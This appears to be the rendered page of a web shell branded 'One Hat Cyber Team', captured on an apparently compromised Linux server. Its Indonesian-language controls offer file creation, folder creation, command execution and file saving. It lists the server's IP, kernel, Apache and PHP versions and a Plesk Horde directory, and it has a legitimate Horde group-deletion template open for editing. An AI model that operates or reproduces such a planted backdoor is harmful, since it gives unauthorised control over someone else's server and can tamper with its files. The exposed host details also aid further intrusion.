⚝
One Hat Cyber Team
⚝
Your IP:
216.73.216.82
Server IP:
41.128.143.86
Server:
Linux host.raqmix.cloud 6.8.0-1025-azure #30~22.04.1-Ubuntu SMP Wed Mar 12 15:28:20 UTC 2025 x86_64
Server Software:
Apache
PHP Version:
8.3.23
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
usr
/
share
/
psa-horde
/
templates
/
admin
/
groups
/
Edit File: delete.inc
<form name="delete" method="post" action="groups.php"> <input type="hidden" name="actionID" value="deleteform" /> <input type="hidden" name="gid" value="<?php echo htmlspecialchars($gid) ?>" /> <?php Horde_Util::pformInput() ?> <h1 class="header"> <?php echo Horde_Themes_Image::tag('group.png') ?> <?php printf(_("Are you sure you wish to delete \"%s\"?"), htmlspecialchars($group)) ?> </h1> <p class="horde-form-buttons"> <input type="submit" class="horde-delete" name="confirm" value="<?php echo _("Delete") ?>" /> <input type="submit" class="horde-cancel" name="confirm" value="<?php echo _("Cancel") ?>" /> </p> </form>
Simpan